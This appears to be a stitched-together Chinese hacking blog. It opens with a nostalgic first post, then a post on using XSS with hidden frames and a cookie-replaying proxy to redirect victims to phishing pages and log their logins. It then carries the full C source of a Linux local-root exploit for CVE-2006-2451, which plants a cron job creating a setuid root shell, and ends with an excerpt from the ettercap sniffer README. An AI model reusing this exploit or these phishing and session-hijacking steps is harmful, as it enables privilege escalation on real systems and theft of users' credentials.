很久以来就一直想做一个自己的站点,十年前我做过一个自己的个人站点当时起名叫绿色兵团（http://i.am/hack)。正是她让我从一个小小的网络管理员走到了这个行业舞台的最前沿。然而事情发展的如此之快，伴随中国互联网络的兴起很长一段时间从某种意义上来说已经不是我私人的东西,网站甚至连goodwell这个名字都是众多业内朋友所众盼的期望和梦想。

没有人想成为英雄，时世造就了英雄。（摘自美国大片《黑鹰坠落》）

从绿色兵团的三次改版和绿盟商业网站的汇编，从一行行的CGI到PHP 、从一张张GIF到Flash 我做过很多站点，但是正真属于自己的网站属于我自己个人的还真没有。

从业其间很多人也问我要过个人的网站地址，我总觉得我还真没有什么理由需要一个个人网站。这次我决定做一个我自己的私人的的网站，主要世间的风雨，人情世故的变化，这一切经历的点点滴滴已经不能再凭自己笨茁的大脑去记忆。我想把我所经历过的一切都记录下来。也许没有人会去关心这些早以逝去的记忆和激情的年代，但是他是我曾经拥有过最大的财富。

这是我写在这个私人blog的第一篇日志，以后我会慢慢的回忆记录这些年发生过的一切，和编写一本以真实的中国黑客发展为背景的小说。

如同我在blog标题上写的

金钱总有花完的一天
美女总有老去的一日
荣耀总有淡忘的一刻
希望百年之后还有人记得你我曾经共同的努力和梦想......

2008 年 Xss 蠕虫也许会和 cookie 注入一样成为黑客入侵的最前沿。

世面上流行的 xss 入侵无非是下面的几种方法
这里我摘用Monyer 写的文章 大家可以具体去看看
http://www.hacker57.cn/article.asp?id=346

当我们跨站成功后 可以指定跳转我们的页面，如果这是个框架页面比如 index.htm
包括了两个页面 1 和 页面 2 (页面 2 是隐藏的）通过写在 页面2 里 简单的 js 程序 我们可以控制页面 1里面的 地址转向
页面 1 先调用 用户正常访问的 页面 ，2分钟后 (通过页面2 的控制 跳转到指定的 密码输入钓鱼页面）

步骤1 跳转载入 index.htm



步骤 2通过页面 2 内 JS 可以 控制 延迟4000 毫秒后 页面1 自动跳转（指跳转一次）4分钟后 用户页面自动跳转



你还可以使用 java 读取 框架内 页面1 内的数据 并定时记录。==============================================

当然很多网站限制了 框架结构 会自动跳出这就需要利用另一个技术 HttpClient来模拟浏览器GET POSTXss

跳转 并传递cookie获取cookie 后 利用 http client 技术 模拟用户访问
他当前的页面获得用户正常访问的 页面代码同时替换所有 url
 比如 把 src=http://www.qq.com/file/admin.asp
替换成 src=http://xxx.com/demo.jsp? url=http://www.qq.com/file/admin.asp
print 输出

这时用户看到的是和原来页面一样的东西但是他这个时候的页面内的所有连接已经被我们替换，意味着他点击的连接会先连向我们的Demo.jsp 然后我们的 demo 会再此模拟他的cookie 去访问这些连接
Print 输出

也许你问这样做的意义是什么？
它可以记录用户从xss跳转后所有的 访问页面 和登陆信息

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer       (main PoC code)   */
/* - RoMaNSoFt (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -p");
}

寻找失落的东西 teso

看看人家6年前的东西，鸡蛋没打破前谁都不知道怎么才能竖立在桌上。
结果却这么简单 .

已经可以ARP 窃听后窜改截获的数据包然后发送 而且非常稳定



============================================================================
                                ettercap 0.6.5                    2002-02-12
============================================================================

    Even if blessed with a feeble intelligence they are cruel and smart...


       @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@
       @@        @@@     @@@   @@      @@   @@ @@      @@   @@ @@   @@
       @@@@@@    @@@     @@@   @@@@@@  @@@@@@  @@      @@@@@@@ @@@@@@
       @@        @@@     @@@   @@      @@  @@  @@      @@   @@ @@
       @@@@@@@   @@@     @@@   @@@@@@@ @@  @@@ @@@@@@@ @@   @@ @@


                     Multi purpose sniffer/interceptor



         Required Libraries:              none ;)  (optionally ncurses)

         Optional Libraries:              openssl  (if you want ssh support)

         Installation:                    configure
                                          make
                                          make install

                         (optional)       make plug-ins
                                          make plug-ins_install

      (if you are lazy, just run)         make complete_install

============================================================================
                                    INTRO
============================================================================

Kiddie:   A friend of mine told me that it is possible to sniff on a LAN...
          so I bought a switch ;)

NaGoR:    mmhhh....

Kiddie:   Now my LAN is SECURE ! you can't sniff my packets... ah ah ah

NaGoR:    are you sure ? look at ettercap doing its work...

Kiddie:   Oh my god... it sniffs all my traffic !!
          I will use only ciphered connections on my LAN, so ettercap can't
          sniff them ! ah ah ah

NaGoR:    mmhhh....

Kiddie:   Now I'm using SSH.  My LAN is SECURE !

NaGoR:    are you sure ? look at ettercap doing its work...

Kiddie:   shit !!  grrrr...


"a false sense of security, is worse than insecurity"   -- Steve Gibson

hey folks... wake up !  the net is NOT secure !!

ettercap demonstrates that now is the time to encourage research on
internet protocols to make them more secure.